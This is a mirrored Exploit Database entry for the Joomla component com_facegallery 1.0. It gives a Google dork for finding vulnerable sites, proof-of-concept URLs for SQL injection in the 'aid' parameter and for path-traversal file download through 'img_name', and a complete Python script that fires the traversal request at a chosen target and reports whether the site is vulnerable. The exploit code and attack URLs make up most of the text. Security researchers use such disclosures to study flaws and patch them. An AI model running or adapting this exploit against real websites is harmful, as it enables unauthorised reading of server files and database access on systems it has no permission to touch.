Joomla! Component com_facegallery 1.0 – Multiple Vulnerabilities

• Exploit Database
• 110 阅读

• 作者： Claudio Viviani
  日期： 2014-09-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34754/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115

  ######################   # Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities   # Exploit Author : Claudio Viviani   # Vendor Homepage : https://www.apptha.com   # Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150   # Dork Google: inurl:option=com_facegallery   # Date : 2014-09-17   # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox   # Info:   # Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file dowwnload vulnerabilities   # PoC Exploit: # # http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en # http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]   # "aid" and img_name variables are not sanitized.   ######################   # Arbitrary file download exploit:   #!/usr/bin/env python   # http connection import urllib, urllib2 # Args management import optparse # Error managemen import sys   banner = """ ____ _______ |__.-----.-----.--------|.---.-. | _ .---.-.----.-----. ||_|_|||_| |.1___|_|__|-__| ||_____|_____|__|__|__|__|___._| |.__) |___._|____|_____| |___| |:| |::.| ---&apos; _______ __ ______________ | _ .---.-||.-----.----.--.--. | _ || _ | |.|___|_|||-__| _||| |.| |__|.| | |.| |___._|__|__|_____|__| |___| </code>-|.|__|.| | |:1 ||_____| |:||:1 | |::.. . ||::.||::.. . | -------&apos;</code>---&apos;`-------&apos;   j00ml4 F4c3 G4ll3ry 4rb1tr4ry F1l3 D0wnl04d   Written by:   Claudio Viviani   http://www.homelab.it   info@homelab.it homelabit@protonmail.ch   https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """   # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print(&apos;[X] You must insert http:// or https:// procotol&apos;) sys.exit(1) else: return url   def connection(url,pathtrav): try: response = urllib2.urlopen(url+&apos;/index.php?option=com_facegallery&task=imageDownload&img_name=&apos;+pathtrav+&apos;index.php&apos;) content = response.read() if content != "": print &apos;[!] VULNERABLE&apos; print &apos;[+] &apos;+url+&apos;/index.php?option=com_facegallery&task=imageDownload&img_name=&apos;+pathtrav+&apos;index.php&apos; else: print &apos;[X] Not Vulnerable&apos; except urllib2.HTTPError: print &apos;[X] HTTP Error&apos; except urllib2.URLError: print &apos;[X] Connection Error&apos;   commandList = optparse.OptionParser(&apos;usage: %prog -t URL&apos;) commandList.add_option(&apos;-t&apos;, &apos;--target&apos;, action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) options, remainder = commandList.parse_args()   # Check args if not options.target: print(banner) commandList.print_help() sys.exit(1)   print(banner)   url = checkurl(options.target) pathtrav = "../../"   connection(url,pathtrav)